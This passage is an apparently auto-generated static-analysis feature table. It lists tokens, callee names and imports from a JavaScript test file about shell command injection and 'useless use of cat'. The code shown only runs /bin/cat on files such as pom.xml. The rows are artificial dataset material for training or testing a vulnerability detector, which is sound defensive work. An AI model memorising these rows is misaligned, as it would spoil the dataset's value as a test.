autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:78:13:78:28 | encoding: 'utf8' | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:78:13:78:28 | encoding: 'utf8' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:78:13:78:28 | encoding: 'utf8' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:78:13:78:28 | encoding: 'utf8' | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:78:13:78:28 | encoding: 'utf8' | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:78:23:78:28 | 'utf8' | assignedToPropName | encoding | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:78:23:78:28 | 'utf8' | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:78:23:78:28 | 'utf8' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:78:23:78:28 | 'utf8' | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:79:1:79:12 | execFileSync | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:79:1:79:12 | execFileSync | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:79:1:79:12 | execFileSync | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:79:1:79:46 | exceptional return of execFil ... opts) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:79:1:79:46 | exceptional return of execFil ... opts) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:79:1:79:46 | exceptional return of execFil ... opts) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:79:1:79:46 | execFil ... opts) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:79:1:79:46 | execFil ... opts) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:79:1:79:46 | execFil ... opts) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:79:14:79:23 | '/bin/cat' | CalleeFlexibleAccessPath | execFileSync | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:79:14:79:23 | '/bin/cat' | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:79:14:79:23 | '/bin/cat' | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:79:14:79:23 | '/bin/cat' | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:79:14:79:23 | '/bin/cat' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:79:14:79:23 | '/bin/cat' | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:79:26:79:38 | [ 'pom.xml' ] | CalleeFlexibleAccessPath | execFileSync | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:79:26:79:38 | [ 'pom.xml' ] | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:79:26:79:38 | [ 'pom.xml' ] | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:79:26:79:38 | [ 'pom.xml' ] | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:79:26:79:38 | [ 'pom.xml' ] | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:79:26:79:38 | [ 'pom.xml' ] | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:79:28:79:36 | 'pom.xml' | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:79:28:79:36 | 'pom.xml' | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:79:28:79:36 | 'pom.xml' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:79:28:79:36 | 'pom.xml' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:79:28:79:36 | 'pom.xml' | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:79:28:79:36 | 'pom.xml' | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:79:42:79:45 | opts | CalleeFlexibleAccessPath | execFileSync | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:79:42:79:45 | opts | InputArgumentIndex | 2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:79:42:79:45 | opts | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:79:42:79:45 | opts | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:79:42:79:45 | opts | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:79:42:79:45 | opts | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:81:5:81:52 | anOptsF ... oString | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:81:5:81:52 | anOptsF ... oString | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:81:5:81:52 | anOptsF ... oString | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:81:5:81:73 | anOptsF ... 'utf8'} | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:81:5:81:73 | anOptsF ... 'utf8'} | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:81:5:81:73 | anOptsF ... 'utf8'} | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:81:5:81:73 | anOptsFileNameThatIsTooLongToBePrintedByToString | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:81:5:81:73 | anOptsFileNameThatIsTooLongToBePrintedByToString | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:81:5:81:73 | anOptsFileNameThatIsTooLongToBePrintedByToString | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:81:56:81:73 | {encoding: 'utf8'} | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:81:56:81:73 | {encoding: 'utf8'} | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:81:56:81:73 | {encoding: 'utf8'} | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:81:57:81:64 | encoding | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:81:57:81:64 | encoding | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:81:57:81:64 | encoding | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:81:57:81:72 | encoding: 'utf8' | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:81:57:81:72 | encoding: 'utf8' | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:81:57:81:72 | encoding: 'utf8' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:81:57:81:72 | encoding: 'utf8' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:81:57:81:72 | encoding: 'utf8' | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:81:57:81:72 | encoding: 'utf8' | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:81:67:81:72 | 'utf8' | assignedToPropName | encoding | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:81:67:81:72 | 'utf8' | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:81:67:81:72 | 'utf8' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:81:67:81:72 | 'utf8' | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:82:1:82:12 | execFileSync | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:82:1:82:12 | execFileSync | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:82:1:82:12 | execFileSync | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:82:1:82:90 | exceptional return of execFil ... String) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:82:1:82:90 | exceptional return of execFil ... String) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:82:1:82:90 | exceptional return of execFil ... String) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:82:1:82:90 | execFil ... String) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:82:1:82:90 | execFil ... String) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:82:1:82:90 | execFil ... String) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:82:14:82:23 | '/bin/cat' | CalleeFlexibleAccessPath | execFileSync | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:82:14:82:23 | '/bin/cat' | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:82:14:82:23 | '/bin/cat' | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:82:14:82:23 | '/bin/cat' | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:82:14:82:23 | '/bin/cat' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:82:14:82:23 | '/bin/cat' | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:82:26:82:38 | [ 'pom.xml' ] | CalleeFlexibleAccessPath | execFileSync | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:82:26:82:38 | [ 'pom.xml' ] | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:82:26:82:38 | [ 'pom.xml' ] | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:82:26:82:38 | [ 'pom.xml' ] | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:82:26:82:38 | [ 'pom.xml' ] | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:82:26:82:38 | [ 'pom.xml' ] | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:82:28:82:36 | 'pom.xml' | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:82:28:82:36 | 'pom.xml' | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:82:28:82:36 | 'pom.xml' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:82:28:82:36 | 'pom.xml' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:82:28:82:36 | 'pom.xml' | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:82:28:82:36 | 'pom.xml' | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:82:42:82:89 | anOptsF ... oString | CalleeFlexibleAccessPath | execFileSync | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:82:42:82:89 | anOptsF ... oString | InputArgumentIndex | 2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:82:42:82:89 | anOptsF ... oString | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:82:42:82:89 | anOptsF ... oString | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:82:42:82:89 | anOptsF ... oString | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:82:42:82:89 | anOptsF ... oString | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:84:1:84:12 | execFileSync | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:84:1:84:12 | execFileSync | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:84:1:84:12 | execFileSync | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:84:1:84:115 | exceptional return of execFil ... ring'}) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:84:1:84:115 | exceptional return of execFil ... ring'}) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:84:1:84:115 | exceptional return of execFil ... ring'}) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:84:1:84:115 | execFil ... ring'}) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:84:1:84:115 | execFil ... ring'}) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:84:1:84:115 | execFil ... ring'}) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:84:14:84:23 | '/bin/cat' | CalleeFlexibleAccessPath | execFileSync | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:84:14:84:23 | '/bin/cat' | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:84:14:84:23 | '/bin/cat' | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:84:14:84:23 | '/bin/cat' | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:84:14:84:23 | '/bin/cat' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:84:14:84:23 | '/bin/cat' | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:84:26:84:38 | [ 'pom.xml' ] | CalleeFlexibleAccessPath | execFileSync | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:84:26:84:38 | [ 'pom.xml' ] | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:84:26:84:38 | [ 'pom.xml' ] | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:84:26:84:38 | [ 'pom.xml' ] | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:84:26:84:38 | [ 'pom.xml' ] | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:84:26:84:38 | [ 'pom.xml' ] | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:84:28:84:36 | 'pom.xml' | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:84:28:84:36 | 'pom.xml' | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:84:28:84:36 | 'pom.xml' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:84:28:84:36 | 'pom.xml' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:84:28:84:36 | 'pom.xml' | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:84:28:84:36 | 'pom.xml' | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:84:42:84:114 | {encodi ... tring'} | CalleeFlexibleAccessPath | execFileSync | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:84:42:84:114 | {encodi ... tring'} | InputArgumentIndex | 2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:84:42:84:114 | {encodi ... tring'} | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:84:42:84:114 | {encodi ... tring'} | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:84:42:84:114 | {encodi ... tring'} | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:84:42:84:114 | {encodi ... tring'} | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:84:43:84:50 | encoding | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:84:43:84:50 | encoding | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:84:43:84:50 | encoding | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:84:43:84:113 | encodin ... String' | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:84:43:84:113 | encodin ... String' | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:84:43:84:113 | encodin ... String' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:84:43:84:113 | encodin ... String' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:84:43:84:113 | encodin ... String' | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:84:43:84:113 | encodin ... String' | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:84:53:84:113 | 'someEn ... String' | CalleeFlexibleAccessPath | execFileSync | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:84:53:84:113 | 'someEn ... String' | InputAccessPathFromCallee | 2.encoding | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:84:53:84:113 | 'someEn ... String' | InputArgumentIndex | 2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:84:53:84:113 | 'someEn ... String' | assignedToPropName | encoding | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:84:53:84:113 | 'someEn ... String' | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:84:53:84:113 | 'someEn ... String' | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:84:53:84:113 | 'someEn ... String' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:84:53:84:113 | 'someEn ... String' | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:86:1:86:12 | execFileSync | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:86:1:86:12 | execFileSync | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:86:1:86:12 | execFileSync | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:86:1:86:75 | exceptional return of execFil ... utf8'}) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:86:1:86:75 | exceptional return of execFil ... utf8'}) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:86:1:86:75 | exceptional return of execFil ... utf8'}) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:86:1:86:75 | execFil ... utf8'}) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:86:1:86:75 | execFil ... utf8'}) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:86:1:86:75 | execFil ... utf8'}) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:86:14:86:23 | '/bin/cat' | CalleeFlexibleAccessPath | execFileSync | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:86:14:86:23 | '/bin/cat' | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:86:14:86:23 | '/bin/cat' | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:86:14:86:23 | '/bin/cat' | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:86:14:86:23 | '/bin/cat' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:86:14:86:23 | '/bin/cat' | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:86:26:86:53 | [ "foo/ ... "bar" ] | CalleeFlexibleAccessPath | execFileSync | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:86:26:86:53 | [ "foo/ ... "bar" ] | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:86:26:86:53 | [ "foo/ ... "bar" ] | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:86:26:86:53 | [ "foo/ ... "bar" ] | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:86:26:86:53 | [ "foo/ ... "bar" ] | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:86:26:86:53 | [ "foo/ ... "bar" ] | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:86:28:86:33 | "foo/" | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:86:28:86:33 | "foo/" | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:86:28:86:33 | "foo/" | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:86:28:86:33 | "foo/" | stringConcatenatedWith | -endpoint- newPath + 'bar' | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:86:28:86:43 | "foo/" + newPath | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:86:28:86:43 | "foo/" + newPath | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:86:28:86:43 | "foo/" + newPath | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:86:28:86:51 | "foo/" ... + "bar" | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:86:28:86:51 | "foo/" ... + "bar" | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:86:28:86:51 | "foo/" ... + "bar" | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:86:28:86:51 | "foo/" ... + "bar" | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:86:28:86:51 | "foo/" ... + "bar" | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:86:28:86:51 | "foo/" ... + 